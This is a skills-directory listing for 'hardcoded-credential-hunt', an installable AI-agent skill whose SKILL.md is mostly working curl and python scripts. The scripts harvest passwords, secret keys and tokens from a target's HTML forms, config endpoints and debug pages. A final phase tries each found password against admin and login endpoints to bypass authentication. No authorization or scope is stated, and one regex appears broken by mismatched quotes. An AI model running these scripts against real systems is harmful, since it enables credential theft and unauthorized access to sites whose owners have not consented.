hardcoded-credential-hunt
Detect hardcoded passwords in HTML forms, JavaScript, and API responses.
Install / Use
npx skills add uphiago/recon-skills --skill hardcoded-credential-huntInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
Development & EngineeringSupported Platforms
Our assessment of hardcoded-credential-hunt
hardcoded-credential-hunt scores 89/100 on our quality scale, 1196th of 4,259 Development & Engineering skills we index (top 29%).
Its SKILL.md is 7.0 KB long, well organised into 24 sections with 5 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so hardcoded-credential-hunt is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
hardcoded-credential-hunt compared with similar skills
All 4 of these similar skills score higher than hardcoded-credential-hunt; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| hardcoded-credential-hunt (this skill)by uphiago | 89 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| ai-job-searchby MadsLorentzen | 100 | 44.6k | 1d ago | CLAUDE.md |
| claude-howtoby luongnv89 | 100 | 41.7k | today | CLAUDE.md |
Frequently asked questions
- How do I install hardcoded-credential-hunt?
- Run
npx skills add uphiago/recon-skills --skill hardcoded-credential-hunt. The install tabs above show the steps for each supported agent. - Which AI agents does hardcoded-credential-hunt work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is hardcoded-credential-hunt safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is hardcoded-credential-hunt still maintained?
- The repository was last updated 29 days ago, so hardcoded-credential-hunt is actively maintained.
Skill content
View source on GitHubname: hardcoded-credential-hunt description: Detect hardcoded passwords in HTML forms, JavaScript, and API responses. version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, python3 tags: [recon, password, credential, hardcoded, HTML, javascript, API] category: recon related_skills:
- api-noauth-hunt
- js-secrets-extraction
- source-leak-hunt
Hardcoded Credential Hunt
Detect credentials baked into client-side code or HTML responses. Targets include master passwords in form value attributes, secret keys in inline scripts, API tokens in configuration endpoints, and plaintext credentials leaked through debug error pages. This class of vulnerability bypasses authentication entirely — no brute force required.
When to Use
- An application serves HTML forms with pre-filled or hidden password fields.
- A configuration endpoint (
/api/config,/env,/settings) returns JSON with credential-like strings. - A debug/error page leaks application secrets in JavaScript variables.
- An unauthenticated API endpoint returns data that controls authentication (reset, exit registration, admin actions).
- JavaScript bundles contain string assignments matching password patterns.
Prerequisites
terminalwith curl and python3.- A target serving HTML, JSON, or JavaScript without proper authentication on configuration/settings endpoints.
- Access to at least one public page, form, or API endpoint.
Quick Detection
# Scan HTML for password fields with pre-filled values
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/PATH" | grep -Eoi '(?:password|passwd|senha|pass|pwd|secret)\s*[=:"]\s*"?[^"&\s]{4,30}"?' | head -10
# Scan JSON config endpoints for credential-like keys
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/config" | python3 -c "
import sys, json, re
try:
data = json.load(sys.stdin)
for k, v in data.items() if isinstance(data, dict) else []:
if any(x in k.lower() for x in ['pass','secret','key','token','auth']):
print(f'{k}: {v}')
except: pass
"
# Scan inline JavaScript for hardcoded secrets
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/" | grep -Eo '(?:SECRET|PASSWORD|API_KEY|TOKEN)\s*=\s*"[^"]{8,}"' | head -10
Procedure
Phase 1 — HTML Form Inspection
Look for password fields with value attributes or hidden inputs containing credentials:
# Extract all password inputs
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/PATH" | python3 -c "
import sys, re
html = sys.stdin.read()
# Inputs with type=password and non-empty value
for m in re.finditer(r'<input[^>]*type\s*=\s*[\"\']password[\"\'][^>]*value\s*=\s*[\"\']([^\"\']+)[\"\']', html):
print(f'PASSWORD FIELD: {m.group(1)}')
# Hidden inputs that look like passwords
for m in re.finditer(r'<input[^>]*type\s*=\s*[\"\']hidden[\"\'][^>]*name\s*=\s*[\"\']([^\"\']*(?:pass|senha|secret|token|key)[^\"\']*)[\"\'][^>]*value\s*=\s*[\"\']([^\"\']+)[\"\']', html, re.IGNORECASE):
print(f'HIDDEN CREDENTIAL: {m.group(1)} = {m.group(2)}')
"
Phase 2 — Configuration Endpoint Probing
Probe common config endpoints that may leak credentials:
for path in /api/config /api/settings /env /api/env /config.json /api/config.json \
/api/v1/config /api/configuration /api/v2/settings /api/status; do
result=$(curl --max-time 30 --connect-timeout 10 -sk "https://target.com$path" -w "\n%{http_code}" 2>/dev/null)
code=$(echo "$result" | tail -1)
if [ "$code" = "200" ]; then
echo "=== $path (200) ==="
echo "$result" | python3 -c "
import sys, json, re
data = sys.stdin.read()
# Try JSON
try:
obj = json.loads(data)
for k, v in obj.items() if isinstance(obj, dict) else []:
if any(x in str(k).lower() for x in ['pass','secret','key','token','auth','jwt']):
print(f' {k}: {v}')
except:
# Try regex on plain text
for m in re.finditer(r'(?:password|passwd|secret|token|api[_-]?key)\s*[=:]\s*[\"']([^\"']{4,})[\"']', data, re.I):
print(f' {m.group(0)}')
" | head -20
fi
done
Phase 3 — Debug Error Page Analysis
Werkzeug, Django, and Express debug pages often leak secrets in inline JavaScript:
# Trigger an error and check for credential leaks
curl --max-time 30 --connect-timeout 10 -sk "https://target.com:PORT/ERROR_TRIGGER_PATH" | python3 -c "
import sys, re
html = sys.stdin.read()
# Werkzeug debugger SECRET
match = re.search(r'SECRET\s*=\s*[\"]([^\"\']+)[\"]', html)
if match: print(f'WERKZEUG_SECRET: {match.group(1)}')
# Django settings
for m in re.finditer(r'SECRET_KEY\s*=\s*[\"]([^\"\']+)[\"]', html):
print(f'DJANGO_SECRET: {m.group(1)}')
# Generic credential patterns
for m in re.finditer(r'(?:PASSWORD|PASS|TOKEN|API_KEY)\s*=\s*[\"]([^\"\']{6,})[\"']", html, re.I):
print(f'LEAKED: {m.group(0)}')
"
Phase 4 — Authentication Bypass Testing
When a hardcoded password is found, test it against all authentication endpoints:
PASSWORD="found_password"
# Test against common auth endpoints
for endpoint in /login /api/login /api/auth/login /auth /admin /api/admin; do
for user in admin administrator root; do
code=$(curl --max-time 30 --connect-timeout 10 -sk -o /dev/null -w "%{http_code}" \
-d "username=$user&password=$PASSWORD" \
"https://target.com$endpoint")
if [ "$code" = "302" ] || [ "$code" = "200" ]; then
echo "SUCCESS: $user:$PASSWORD at $endpoint (HTTP $code)"
fi
done
done
Pitfalls
- Placeholder values look real. Test
password123,changeme, and empty strings before reporting — they are often development defaults. - The credential may be scoped. A password for "exit registration" is not a full admin password. Map the credential to its actual permissions before scoring.
- Form values may be dynamic. Check if the password changes per session (CSRF token pattern) vs. being truly static.
- Base64 is not encryption. Decode any base64-looking strings found in JavaScript — they frequently contain credentials.
- Rate limiting may block testing. Space authentication attempts 2-3 seconds apart.
Verification
- Confirm the credential is static: fetch the page/endpoint three times and verify the password value is identical each time.
- Confirm it grants access: use the credential at the intended endpoint and verify the response differs from a failed attempt (HTTP 200/302 vs 401/403).
- Map the privilege level: test the credential against other endpoints to determine scope (read-only, write, admin, reset).
- Check for audit trail: repeat the access with a unique identifier in the request to verify the action appears in logs (confirms real impact).
Related Skills
api-noauth-hunt— Exploiting API endpoints that lack authentication entirely.js-secrets-extraction— Finding API keys and tokens in JavaScript bundles.source-leak-hunt— Detecting exposed configuration files (.env, wp-config, etc.).flask-werkzeug-attack— Exploiting Werkzeug debugger SECRET leaks and traceback disclosure.
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
ai-job-search
44.6kThe job search that runs on your machine. AI job application framework built on Claude Code: evaluate postings, tailor CVs, write cover letters, prep interviews. Fork it and own it.
claude-howto
41.7kA visual, example-driven guide to Claude Code — from basic concepts to advanced agents, with copy-paste templates that bring immediate value.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
